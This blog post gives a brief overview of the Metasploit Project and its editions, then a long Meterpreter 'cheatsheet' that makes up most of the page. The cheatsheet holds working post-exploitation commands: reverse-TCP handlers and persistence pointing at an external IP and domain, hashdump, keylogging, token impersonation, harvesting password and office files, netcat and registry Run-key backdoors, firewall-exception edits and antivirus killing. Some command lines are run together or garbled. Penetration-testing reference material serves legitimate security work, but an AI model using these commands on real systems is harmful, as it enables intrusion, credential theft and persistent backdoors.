22 Oct 2018

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Metasploit is best known as Framework, where user can build their own tools for finding exploits in applications, Operating system and networks. A tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. Metasploit interfaces There are several interfaces for Metasploit available. The most popular are maintained by Rapid7 and Strategic Cyber LLC. Metasploit Framework Edition The free version. It contains a command line interface, third-party import, manual exploitation and manual brute forcing. This free version of metasploit project also includes Zenmap, a well known ports-scanner and a compiler for Ruby, the language in which this version of metasploit was written. Metasploit Community Edition In October 2011, Rapid7 released Metasploit Community Edition, a free, web-based user interface for Metasploit. Metasploit Community is based on the commercial functionality of the paid-for editions with a reduced set of features, including network discovery, module browsing and manual exploitation. Metasploit Community is included in the main installer. Metasploit Express In April 2010, Rapid7 released Metasploit Express, an open-core commercial edition for security teams who need to verify vulnerabilities. It offers a graphical user interface, integrates nmap for discovery, and adds smart bruteforcing as well as automated evidence collection. Metasploit Pro In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers. Metasploit Pro adds onto Metasploit Express with features such as Quick Start Wizards/MetaModules, building and managing social engineering campaigns, web application testing, an advanced Pro Console, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and VPN pivoting. Armitage Armitage is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration allowing for shared sessions, data, and communication through a single Metasploit instance.[11] Cobalt Strike Cobalt Strike is a collection of threat emulation tools provided by Strategic Cyber LLC to work with the Metasploit Framework. Cobalt Strike includes all features of Armitage and adds post-exploitation tools, in addition to report generation features.

Metasploit Cheatsheet and Commands are as follows.

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set AutoRunScript pathto script you want to autorun after exploit is run set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 exploit -j -z


# file_autopwn rm -Rf /tmp/1 mkdir /tmp/1 rm -Rf ~/.msf3 wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf ./msfconsole db_driver sqlite3 db_create pentest11 setg LHOST 75.139.158.51 setg LPORT 21 setg SRVPORT 21 setg LPORT_WIN32 21 setg INFILENAME /tmp/file3.pdf use auxiliary/server/file_autopwn set OUTPATH /tmp/1 set URIPATH /msf set SSL true set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp setg PAYLOAD windows/meterpreter/reverse_tcp set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 run


# shows all the scripts run


# persistence! broken …if you use DNS name .. run persistence -r 75.139.158.51 -p 21 -A -X -i 30


run get_pidgin_creds idletime sysinfo


# SYSTEM SHELL ( pick a proc that is run by system ) migrate 376 shell


# session hijack tokens use incognito impersonate_token “NT AUTHORITY\\SYSTEM”


# escalate to system use priv getsystem


execute -f cmd.exe -H -c -i -t execute -f cmd.exe -i -t


# list top used apps run prefetchtool -x 20


# list installed apps run prefetchtool -p


run get_local_subnets


# find and download files run search_dwld “%USERPROFILE%\\my documents” passwd run search_dwld “%USERPROFILE%\\desktop passwd run search_dwld “%USERPROFILE%\\my documents” office run search_dwld “%USERPROFILE%\\desktop” office


# alternate download -r “%USERPROFILE%\\desktop” ~/ download -r “%USERPROFILE%\\my documents” ~/


# alternate to shell not SYSTEM # execute -f cmd.exe -H -c -i -t


# does some run wmic commands etc run winenum


# rev shell the hard way run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”


# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor. run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4 run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4


# vnc / port fwd for linux run vnc


# priv esc run kitrap0d


run getgui


# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?! run killav run winemun run memdump run screen_unlock


upload /tmp/system32.exe C:\\windows\\system32\\ reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe” reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32 upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”


getuid ps getpid keyscan_start keyscan_dump migrate 520 portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″ portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666


shell run myremotefileserver_mserver -h run myremotefileserver_mserver -p 8787


run msf_bind run msf_bind -p 1975 rev2self getuid


getuid enumdesktops grabdesktop run deploymsf -f framework-3.3-dev.exe run hashdump run metsvc run scraper run checkvm run keylogrecorder run netenum -fl -hl localhostlist.txt -d google.com run netenum -rl -r 10.192.0.50-10.192.0.254 run netenum -st -d google.com run netenum -ps -r 10.192.0.50-254


# Windows Login Brute Force Meterpreter Script run winbf -h


# upload a script or executable and run it uploadexec


# Using Payload As A Backdoor from a shell REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe” SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011


# kill AV this will not unload it from mem it needs reboot or kill from memory still … Darkspy, Seem, Icesword GUI can kill the tasks catchme.exe -K “c:\Program Files\Kaspersky\avp.exe” catchme.exe -E “c:\Program Files\Kaspersky\avp.exe” catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

IT Security Professional – Security Researcher & Consultant for the Government, Enthusiast, Malware Analyst, Penetration Tester.

Leave your thought

This site uses Akismet to reduce spam. Learn how your comment data is processed.